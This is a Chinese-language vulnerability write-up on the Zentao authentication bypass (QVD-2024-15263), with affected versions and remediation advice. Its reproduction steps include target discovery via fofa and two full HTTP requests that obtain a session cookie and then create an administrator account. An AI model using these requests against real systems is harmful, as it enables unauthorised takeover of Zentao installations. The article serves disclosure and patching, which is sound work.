禅道(Zentao)是一款开源的项目管理和协作软件,广泛应用于敏捷开发中,禅道系统中存在一些安全漏洞,其中最为显著的是身份认证绕过漏洞(QVD-2024-15263),以下是关于这个漏洞的详细分析:
漏洞描述
禅道项目管理系统存在身份认证绕过漏洞,该漏洞允许攻击者通过构造特定的请求包来获取系统Cookie,并利用该Cookie创建任意账号,实现未授权登录。
漏洞复现步骤
1、信息收集:通过fofa搜索标题为“禅道”的网站。
2、本地复现:下载禅道源码并进行本地部署。
3、获取Cookie:
构造GET请求,访问特定API接口以获取Set-Cookie头部信息。
示例请求:
```plaintext
GET /zentaopms/www/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: ip
```
4、创建账户:
使用获取到的Cookie构造POST请求,添加新用户。
示例请求:
```plaintext
POST /zentaopms/www/api.php/v1/users HTTP/1.1
Host: ip
Cookie: zentaosid=c5gfr88h22f4vv73h4d0b453mv; lang=zh-cn; device=desktop; theme=default
{"account": "longl", "password": "Qwe123", "realname": "longl", "group":"1"}
```
“group”为管理员分组,表示创建的用户将具有管理员权限。
5、登录验证:使用新创建的账号和密码尝试登录系统,验证是否成功绕过身份认证。
影响范围
该漏洞影响了禅道项目管理系统的不同版本,具体包括:
开源版:16.x <= 禅道 < 18.12
企业版:6.x <= 禅道 < 8.12
旗舰版:3.x <= 禅道 < 4.12
风险等级
该漏洞的风险等级被评定为高危,因为它允许攻击者在未经授权的情况下创建任意账号并登录系统,进而可能执行其他恶意操作。
修复建议
为了修复此漏洞,建议系统管理员采取以下措施:
1、升级版本:将禅道项目管理系统升级到最新版本(如18.12),该版本已修复了此漏洞。
2、限制访问:对敏感API接口进行访问控制,确保只有经过身份验证的用户才能调用这些接口。
3、加强安全审计:定期对系统进行安全审计,及时发现并修复潜在的安全漏洞。
信息仅供参考,并不构成专业的安全建议,在实际操作中,请务必遵循相关安全规范和最佳实践。
本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/60447.html